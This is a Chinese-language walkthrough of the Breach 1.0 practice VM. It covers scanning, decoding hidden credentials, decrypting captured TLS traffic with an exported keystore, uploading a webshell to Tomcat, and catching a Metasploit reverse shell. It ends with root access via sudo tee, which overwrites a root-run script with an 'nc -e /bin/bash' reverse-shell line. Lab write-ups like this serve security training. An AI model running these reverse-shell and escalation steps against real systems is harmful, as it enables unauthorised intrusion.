当前位置:   article > 正文

breach1.0靶场_breach1.0靶场login

breach1.0靶场login

1.nmap扫描ip靶机端口

在这里插入图片描述在这里插入图片描述
2.进入首页http://192.168.110.140/
在这里插入图片描述
3.查看页面源代码 发现
在这里插入图片描述

两次base64解密<!------pgibbons:damnitfeel g o o d t o b e a g a n g goodtobeagang goodtobeagangta ----->
这个可能是某个地方的账号密码 (先记下来)
4.点击主页图片 再进入
在这里插入图片描述
5.发现一个登陆界面 用刚才的密码登录
在这里插入图片描述
6.点击各个功能点 发现邮件里有一个keystore的文件,点击下载
在这里插入图片描述
7.继续浏览功能点发现一个按钮,点击此链接
在这里插入图片描述
8.发现一个pcap流量包,点击下载 同时观察页面发现重要信息密码都是tomcat
在这里插入图片描述
9.把第一个下载的文件kerstore放到根目录,进入java/jre
将keystore放到C盘根目录,查看keystore这个密钥库里面的所有证书
keytool -list -keystore c:\keystore 输入密钥库口令tomcat:

从密钥库导出.p12证书,将keystore拷贝到keytool目录,导出名为:tomcatkeystore.p12的证书,命令:
keytool -importkeystore -srckeystore c:\keystore -destkeystore c:\tomcatkeystore.p12 -deststoretype PKCS12
-srcalias tomcat

在这里插入图片描述在这里插入图片描述在这里插入图片描述
10.将导出的证书导入wireshare

导入流量包
在这里插入图片描述
在这里插入图片描述

在流量包里找到后台地址
在这里插入图片描述
账号密码流量包
在这里插入图片描述
11.访问后台,解密后得tomcat:Tt\5D8F(#!*u=G)4m7zB
由于该地址的证书不安全,所以需要开启burpsuite,经过代理可以添加安全例外
在这里插入图片描述

传完马的位置 192.168.110.140:8443/压缩包的名字/木马名字.jsp
在这里插入图片描述
发现的问题:上传的菜刀马,一会儿就会消失,文件被删除,需要重新上传war包才能够继续使用菜刀,主机可能有杀软或者杀web shell工具。解决方法:bash反弹一个shell出来。
11.制作msf5马
在这里插入图片描述
配置msf5准备监听

在这里插入图片描述

将木马上传到服务器,访问木马,反弹到shell

在这里插入图片描述

反弹终端
在这里插入图片描述在这里插入图片描述

收集主机信息
在这里插入图片描述
查看用户的密码,发现两个用户
在这里插入图片描述

进入数据库,好像不用密码

在这里插入图片描述

查看数据库中的内容
在这里插入图片描述

得到密码:thelaststraw
登陆用户milton
在这里插入图片描述
在这里插入图片描述
但是有个图片文件,联想到blumbergh用户下应该也有图片
进不去,但是在前面的时候有个gif的图片

在这里插入图片描述

将下载好的图片打包在这里插入图片描述

打印图片中的可打印字符,追加输出到image.txt

在这里插入图片描述

提权成功

在这里插入图片描述

查看历史命令
在这里插入图片描述

查看用户权限
在这里插入图片描述
查看权限发现/usr/share/cleanup/tidyup.sh只有root可写
在这里插入图片描述
可以用root权限运行tee命令
在这里插入图片描述
那么用tee命令写tidyup.sh:先将反弹shell命令写入shell.txt文件,使用bash反弹shell命令没有成功,于是使用nc命令反弹shell成功,所以写nc反弹命令
echo “nc -e /bin/bash 192.168.110.128 8989” > shell.txt
用tee命令将shell.txt内容输出到tidyup.sh
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
查看是够写入成功
cat /usr/share/cleanup/tidyup.sh

开启监听
在这里插入图片描述
成功 用id命令查看权限
用命令python -c 'import pty;pty.spawn("/bin/bash")'得到交互页面
在这里插入图片描述
将图片挪到home目录下
在这里插入图片描述
上传大马
在这里插入图片描述

拿到flag
在这里插入图片描述

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家小花儿/article/detail/687457
推荐阅读
相关标签
  

闽ICP备14008679号